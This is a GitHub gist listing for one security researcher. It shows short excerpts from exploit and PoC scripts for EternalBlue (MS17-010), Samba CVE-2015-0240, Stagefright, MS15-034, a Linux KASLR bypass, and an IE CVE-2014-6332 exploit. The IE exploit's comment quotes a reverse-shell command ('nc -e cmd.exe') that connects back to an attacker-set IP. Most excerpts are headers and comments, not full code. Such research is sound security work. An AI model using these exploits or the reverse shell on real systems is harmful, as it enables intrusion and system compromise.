Worawit Wangwarunyoo worawit

worawit / ildumper_script_reader.py
Last active Dec 6, 2019
Ghidra script to read script.py from Il2CppDumper
# -*- coding: utf-8 -*-
import ghidra.program.model.symbol.SourceType
import re
functionManager = currentProgram.getFunctionManager()
#minAddress = currentProgram.getMinAddress()
baseAddress = currentProgram.getImageBase()
USER_DEFINED = ghidra.program.model.symbol.SourceType.USER_DEFINED
worawit / break_linux_kaslr_nopti.c
/*
This PoC is based on http://www.immunityinc.com/downloads/x86leaks_old.pdf
The PoC finds direct physical map and kernel text address in Linux kernel without PTI on Intel x64.
The PoC might not work correctly in VM. For example, this PoC cannot find correct direct physical map
address in KVM. The reason is in https://www.kernel.org/doc/Documentation/virtual/kvm/mmu.txt
$ ./break_linux_kaslr_nopti
worawit / eternalblue_merge_shellcode.py
Last active Nov 28, 2021
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
    print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
    sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
worawit / eternalblue8_exploit.py
Last active Oct 3, 2021
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
worawit / eternalblue7_exploit.py
Last active Sep 6, 2021
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depending on what is overwritten)
worawit / sf-itunes-poc.py
#!/usr/bin/python
"""
Stagefright PoC for https://android.googlesource.com/platform/frameworks/av/+/2b50b7aa7d16014ccf35db7a7b4b5e84f7b4027c
"""
from struct import pack
def create_box(atom_type, data):
    # MP4 box: 4-byte big-endian size (header included), 4-byte type, payload
    return pack("!I", len(data)+4+4) + atom_type + data
worawit / http_sys_pseudo.c
Last active Jul 30, 2021
MS15-034 (CVE-2015-1635) PoCs
/*
Pseudo code in HTTP.sys to understand the flow related to MS15-034.
All pseudo code is reversed from the vulnerable HTTP.sys on Windows 7 SP1 x86.
For anyone who wants to know which functions are patched:
open the patched version and find all functions that reference RtlULongLongAdd().
*/
worawit / cve-2015-0240_samba_exploit.py
Created Apr 10, 2015
Exploit for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerability (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 in which 'creds' is controlled by
the ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value to the 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
worawit / cve-2015-0240_samba_poc
Last active Mar 5, 2021
PoC for Samba vulnerability (CVE-2015-0240)
#!/usr/bin/python
"""
PoC for Samba vulnerability (CVE-2015-0240) by sleepya
This PoC only triggers the bug
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
#################
Exploitability against CentOS/Ubuntu binaries
worawit / cve-2014-6332_exploit.html
Last active Oct 30, 2021
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost), then get a shell
The exploit drops nc.exe, then executes "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in the javascript below determine the connect-back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windows 8.1 64-bit (EPM is off)